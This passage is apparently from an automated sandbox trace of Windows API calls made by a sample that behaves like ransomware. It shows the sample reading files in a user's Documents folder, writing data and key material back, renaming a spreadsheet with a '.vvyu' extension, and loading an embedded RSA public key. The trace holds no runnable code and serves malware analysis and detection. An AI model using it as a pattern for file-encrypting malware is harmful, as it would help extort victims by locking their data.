(HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41968 [0192.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c70 [0192.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ca0 [0192.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d00 [0192.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cb8 [0192.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.038] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0192.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0192.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d00 [0192.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0192.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cb8 [0192.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39ca0 [0192.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0192.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0192.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0192.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0192.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0192.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.040] GetCurrentThreadId () returned 0x264 [0192.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44e10 [0192.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.041] GetCurrentThreadId () returned 0x264 [0192.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d00 [0192.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ca0 [0192.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0192.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cb8 [0192.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c88 [0192.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d18 [0192.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0192.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ce8 [0192.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cd0 [0192.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d30 [0192.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cd0 [0192.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0192.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ca0 [0192.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0192.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0192.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0192.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0192.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0192.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41968 | out: hHeap=0x6a0000) returned 1 [0192.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0192.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.052] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xe24c, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xe24c, lpOverlapped=0x0) returned 1 [0192.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.053] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe251, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.053] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.055] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.056] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.056] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.056] CloseHandle (hObject=0x584) returned 1 [0192.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0192.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0192.058] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\a2_m3nQdrDmG.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\a2_m3nqdrdmg.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\a2_m3nQdrDmG.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\a2_m3nqdrdmg.xlsx.vvyu")) returned 1 [0192.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.059] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0192.062] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7730c240, ftCreationTime.dwHighDateTime=0x1d8a53a, ftLastAccessTime.dwLowDateTime=0xe06955a0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0xe06955a0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ivoTJ", cAlternateFileName="")) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0192.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9bd8 [0192.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0192.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0192.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cbfa50 | out: hHeap=0x6a0000) returned 1 [0192.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0192.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0192.081] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d974340, ftCreationTime.dwHighDateTime=0x1d89ece, ftLastAccessTime.dwLowDateTime=0x3e1fac80, ftLastAccessTime.dwHighDateTime=0x1d89efc, ftLastWriteTime.dwLowDateTime=0x3e1fac80, ftLastWriteTime.dwHighDateTime=0x1d89efc, nFileSizeHigh=0x0, nFileSizeLow=0xf0c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tEiHH.pdf", cAlternateFileName="")) returned 1 [0192.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x751d68 [0192.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.081] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\tEiHH.pdf") returned=".pdf" [0192.081] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\tEiHH.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\teihh.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.082] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=61636) returned 1 [0192.082] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.085] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf09e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.085] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.087] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.087] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xf0c4, lpOverlapped=0x0) returned 1 [0192.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.089] lstrlenA (lpString="-----BEGIN PUBLIC 